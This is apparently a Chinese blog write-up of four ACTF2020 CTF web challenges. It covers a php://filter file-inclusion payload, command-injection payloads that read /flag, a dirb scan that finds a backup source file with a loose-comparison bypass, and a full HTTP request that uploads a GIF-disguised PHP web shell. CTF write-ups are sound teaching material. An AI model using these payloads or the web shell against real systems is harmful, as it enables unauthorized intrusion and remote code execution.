ACTF2020刷题

web

Include

简单为协议包含

1
2
3
4
?file=php://filter/convert.base64-encode/resource=flag.php  然后base64解密

echo "Can you find out the flag?";
//flag{9dc5b2d8-37cf-45a6-b5a3-68b3d5c6c2e5}

Exec

没有进行过滤处理,考的是linux的知识点。一行linux语句如何执行多条linux语句。使用&&连接,或者分号;隔开。也可以使用管道符号

但是在此处只能使用|和分号。(不太清楚)

payload

1
2
3
127.0.0.1 | cat /flag
或者
127.0.0.1;cat /flag

BackupFile

扫描目录发现备份文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
sunny250@kali ~ # dirb http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ~/web/dictionaries/CTFwebdir.txt 

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Apr 26 13:01:43 2020
URL_BASE: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/
WORDLIST_FILES: /Users/sx/web/dictionaries/CTFwebdir.txt

-----------------

GENERATED WORDS: 53

---- Scanning URL: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ----
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/index.php.bak (CODE:200|SIZE:347)
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/flag.php (CODE:200|SIZE:0)

-----------------
END_TIME: Sun Apr 26 13:01:46 2020
DOWNLOADED: 53 - FOUND: 2

访问index.php.bak得到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
include_once "flag.php";

if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}

若类型比较会先转换,字符串于整型对比,都会转换成整型。

参考文章

intval函数

输入key=123即可

Upload

打开题目是一个灯,鼠标移动到灯泡之后可以看见一个上传界面

直接上传1.php发现被禁止,尝试掐后缀,发现phtml可以

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
POST / HTTP/1.1
Host: 32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380150826415384369013004740571
Content-Length: 406
Origin: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
Connection: close
Referer: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn/
Upgrade-Insecure-Requests: 1

-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="upload_file"; filename="1.phtml"
Content-Type: image/gif

GIF89a
<script language="php">
eval($_POST[cmd]);
</script>
-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="submit"

upload
-----------------------------380150826415384369013004740571--

然后得到上传地址,使用蚁剑连接,拿flag

  • © 2019-2023 sunny250
  • Hexo Theme Ayer by shenyu
    • PV:
    • UV: